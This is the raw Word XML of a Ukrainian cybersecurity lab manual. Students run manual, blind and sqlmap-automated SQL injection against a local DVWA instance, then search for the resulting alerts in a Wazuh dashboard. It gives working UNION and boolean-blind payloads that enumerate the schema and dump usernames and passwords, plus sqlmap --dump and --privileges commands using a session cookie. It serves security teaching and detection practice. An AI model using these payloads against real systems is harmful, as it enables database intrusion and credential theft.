      <w:r w:rsidRPr="00323C75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35576246" w14:textId="77777777" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C75">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="705"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00323C75">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Встановіть рівень: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9C6A3" w14:textId="794C0465" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C75">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="705"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t xml:space="preserve">Натисніть </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3C7057" w14:textId="26B00024" w:rsidR="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C7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23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Ручна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атака</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49021C86" w14:textId="369A09D3" w:rsidR="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C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323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розділу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323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06075C" w14:textId="45BF0FEC" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C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Введіть у поле </w:t>
      </w:r>
      <w:r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32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23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простий текст:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719E996C" w14:textId="77777777" w:rsidR="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C75">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D9B33E" w14:textId="44DD36AD" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C7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Спостерігайте нормальну відповідь.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5A3DC1" w14:textId="36DF44E0" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C75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Тест на помилки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E08488" w14:textId="77777777" w:rsidR="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C75">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA13D7D" w14:textId="01B97373" w:rsidR="00323C75" w:rsidRPr="00323C75" w:rsidRDefault="00323C75" w:rsidP="00323C7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Якщо бачите помилку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додаток вразливий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E96A19" w14:textId="2B4FBD73" w:rsidR="00AA68D9" w:rsidRP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Спробуйте отримати версію БД:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580E1F8F" w14:textId="2D23A0DF" w:rsidR="00AA68D9" w:rsidRPr="00AA68D9" w:rsidRDefault="00AA68D9" w:rsidP="00AA68D9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1=0 UNION SELECT null, version()'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CCD625" w14:textId="57D4EBE8" w:rsidR="00AA68D9" w:rsidRP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Отримайте назву поточної БД:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11239421" w14:textId="1E6B0CDC" w:rsidR="00AA68D9" w:rsidRPr="00AA68D9" w:rsidRDefault="00AA68D9" w:rsidP="00AA68D9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1=0 UNION SELECT database(),'1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B2ABFD" w14:textId="11E19E78" w:rsidR="00AA68D9" w:rsidRP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Виведіть список таблиць:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF1E61" w14:textId="178910BA" w:rsidR="00AA68D9" w:rsidRPr="00AA68D9" w:rsidRDefault="00AA68D9" w:rsidP="00AA68D9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1=0 UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() UNION SELECT null,'1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FD879F" w14:textId="3AF461B4" w:rsidR="00AA68D9" w:rsidRP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Отримайте структуру таблиці </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users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9C245F" w14:textId="03A57488" w:rsidR="00AA68D9" w:rsidRPr="00AA68D9" w:rsidRDefault="00AA68D9" w:rsidP="00AA68D9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1=0 UNION SELECT null, column_name FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>information_schema.columns WHERE table_name='users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E003E2" w14:textId="2DBA6BC0" w:rsidR="00AA68D9" w:rsidRP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Витягніть дані користувачів:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C140D75" w14:textId="63C46BDB" w:rsidR="00AA68D9" w:rsidRPr="00AA68D9" w:rsidRDefault="00AA68D9" w:rsidP="00AA68D9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1=0 UNION SELECT user, password FROM users UNION SELECT null, '1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AFD1D8" w14:textId="15195768" w:rsidR="00AA68D9" w:rsidRP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Збережіть отримані дані для аналізу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFF116" w14:textId="14C26C58" w:rsidR="00AA68D9" w:rsidRDefault="00AA68D9" w:rsidP="00AA68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441D7BB" wp14:editId="0BECC15B">
            <wp:extent cx="4140679" cy="2921269"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51847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756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6218" cy="29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6BA86" w14:textId="7036D041" w:rsidR="00AA68D9" w:rsidRDefault="00631E4E" w:rsidP="00631E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1 – Приклад реалізації атаки типу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631E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</w:p>
    <w:p w14:paraId="0BBC4F83" w14:textId="59F47FF0" w:rsidR="00AA68D9" w:rsidRDefault="00AA68D9" w:rsidP="00AA68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Перейдіть до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection (Blind)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78B6E4" w14:textId="197FBF1A" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00AA68D9" w:rsidP="00631E4E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Перевірте існування користувача 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631E4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7168554" w14:textId="77777777" w:rsidR="00631E4E" w:rsidRPr="00677722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(SELECT COUNT(*) FROM users WHERE user='admin')&gt; '0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F51B83F" w14:textId="54D2FC38" w:rsidR="00631E4E" w:rsidRPr="00631E4E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(SELECT COUNT(*) FROM users WHERE user='blabla')&gt; '0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E534A61" w14:textId="18A0644D" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E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Визначте довжину пароля </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3E8E80" w14:textId="77777777" w:rsidR="00631E4E" w:rsidRPr="00677722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LENGTH((SELECT password FROM users WHERE user='admin'))&gt; '8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED7F8C" w14:textId="77777777" w:rsidR="00631E4E" w:rsidRPr="00677722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LENGTH((SELECT password FROM users WHERE user='admin'))&gt; '32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9690D2" w14:textId="5C3491F9" w:rsidR="00631E4E" w:rsidRPr="00631E4E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1' AND LENGTH((SELECT password FROM users WHERE user='admin'))&gt; '31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165DE4BA" w14:textId="3AD3D680" w:rsidR="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E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1E4E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Автоматизована атака з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6567AC" w14:textId="1F398762" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00D925AC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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терміналі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631E4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D925AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>задайте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змінної </w:t>
      </w:r>
      <w:r w:rsidR="00D925AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TARGET</w:t>
      </w:r>
      <w:r w:rsidR="00D925AC" w:rsidRPr="00D925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тестування:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C4705" w14:textId="09FA2845" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>TARGET</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:r w:rsidRPr="00324EA5">
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>sqli</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>=1&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C7FBAD" w14:textId="36865E28" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00324EA5">
        <w:t>echo $TARGET_URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E95CAD6" w14:textId="5FAEEE99" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E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Встановіть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cookies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5EB9F5" w14:textId="60719B00" w:rsidR="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"># Отримайте </w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> через браузер (</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">12 -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> і виконайте наступну команду в терміналі</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A71F284" w14:textId="77777777" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDB9C62" w14:textId="01E046C7" w:rsidR="00631E4E" w:rsidRPr="00631E4E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COOKIE="security=low; PHPSESSID=YOUR_SESSION_ID"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209DD3EC" w14:textId="24851F22" w:rsidR="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E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77722">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FF0112E" wp14:editId="5CD64E42">
            <wp:extent cx="4451230" cy="315131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931" cy="317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825CB" w14:textId="4029728D" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E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2 – Приклад отримання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cookie </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2638C2FF" w14:textId="1F2EBE04" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E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Запустіть базове сканування </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F287851" w14:textId="030D49DD" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E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 xml:space="preserve">sqlmap -u "$TARGET_URL" --cookie="$COOKIE" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E2703F" w14:textId="18282834" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E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Отримайте список баз даних:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DEEB6F" w14:textId="3211CFAB" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk223082900"/>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --dbs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="741004D1" w14:textId="6DE9BD3E" w:rsidR="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E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C54E386" wp14:editId="5EA31963">
            <wp:extent cx="5434641" cy="3557642"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1357810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103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31" cy="356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DD6E1" w14:textId="3D26F3AD" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="00631E4E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3 – Приклад автоматизованого сканування вразливості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</w:p>
    <w:p w14:paraId="50EC2440" w14:textId="22ADDC17" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="009E672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Отримайте таблиці з БД </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:r w:rsidRPr="00631E4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D68C8CA" w14:textId="02E11B0D" w:rsidR="00631E4E" w:rsidRPr="00631E4E" w:rsidRDefault="00631E4E" w:rsidP="009E6723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 xml:space="preserve">sqlmap -u "$TARGET_URL" --cookie="$COOKIE" -D dvwa --tables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E3152" w14:textId="633C440B" w:rsidR="00631E4E" w:rsidRPr="009E6723" w:rsidRDefault="00631E4E" w:rsidP="009E672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Витягніть дані з таблиці </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742C109E" w14:textId="6CC6D2FD" w:rsidR="00631E4E" w:rsidRPr="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E6723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 xml:space="preserve">sqlmap -u "$TARGET_URL" --cookie="$COOKIE" -D dvwa -T users --dump </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B13007" w14:textId="71A1F1D1" w:rsidR="00631E4E" w:rsidRPr="009E6723" w:rsidRDefault="00631E4E" w:rsidP="009E672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Збережіть результати у файл:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5395C260" w14:textId="422B3FA2" w:rsidR="00631E4E" w:rsidRPr="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E6723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>sqlmap -u "$TARGET_URL" --cookie="$COOKIE" -D dvwa -T users --dump --batch &gt; sqlmap_results.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CE6173" w14:textId="7AC7EAC0" w:rsidR="009E6723" w:rsidRPr="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E672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 версію СУБД:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C76838F" w14:textId="6285BE49" w:rsidR="009E6723" w:rsidRPr="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E6723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 xml:space="preserve">sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --banner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799DBBFD" w14:textId="5EED8D97" w:rsidR="009E6723" w:rsidRPr="00C941C4" w:rsidRDefault="009E6723" w:rsidP="009E672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Отримайте інформацію про користувача БД:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B848AF0" w14:textId="15EC66C6" w:rsidR="009E6723" w:rsidRPr="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E6723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 xml:space="preserve">sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --current-user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A96B8F" w14:textId="0BB5DD4F" w:rsidR="009E6723" w:rsidRPr="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E6723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Перевірте привілеї:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2163516C" w14:textId="77685452" w:rsidR="009E6723" w:rsidRPr="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E6723">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --privileges </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00677722">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BF6E34" w14:textId="40CCF61B" w:rsidR="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E672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9E6723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атак у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6B1EA7" w14:textId="2D85C830" w:rsidR="009E6723" w:rsidRPr="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E672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Відкрийте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wazuh Dashboard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393451" w14:textId="005DAE56" w:rsidR="009E6723" w:rsidRPr="009E6723" w:rsidRDefault="009E6723" w:rsidP="00D566C9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>https://localhost:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CB36AD" w14:textId="5B3D06BB" w:rsidR="009E6723" w:rsidRPr="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E672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Увійдіть з обліковими даними:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E994FD" w14:textId="77777777" w:rsidR="009E6723" w:rsidRPr="00CD7BAE" w:rsidRDefault="009E6723" w:rsidP="00D566C9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>Username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01C494" w14:textId="4F381F28" w:rsidR="009E6723" w:rsidRPr="009E6723" w:rsidRDefault="009E6723" w:rsidP="00D566C9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7BAE">
        <w:t>Password: SecretPassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73360456" w14:textId="3BA863E3" w:rsidR="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E672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Перейдіть до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Threat</w:t>
      </w:r>
      <w:r w:rsidRPr="009E6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Hunting</w:t>
      </w:r>
      <w:r w:rsidRPr="009E6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налаштуйте фільтр:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460CE0D8" w14:textId="77A7C3AB" w:rsidR="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E6723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Time range: Last 30 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4F390" w14:textId="6497AB8B" w:rsidR="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E672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Знайдіть алерти пов’язані з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9E6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9CEBFC" w14:textId="4A1696BA" w:rsidR="009E6723" w:rsidRDefault="009E6723" w:rsidP="009E67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2300">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="393BC283" wp14:editId="44A1FDBF">
            <wp:extent cx="5184475" cy="306025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8165" cy="306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431B3" w14:textId="5A1F735C" w:rsidR="00D566C9" w:rsidRPr="00F534BD" w:rsidRDefault="00D566C9" w:rsidP="00F534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4 – Приклад </w:t>
      </w:r>
      <w:r w:rsidR="00F534BD">
        <w:rPr>
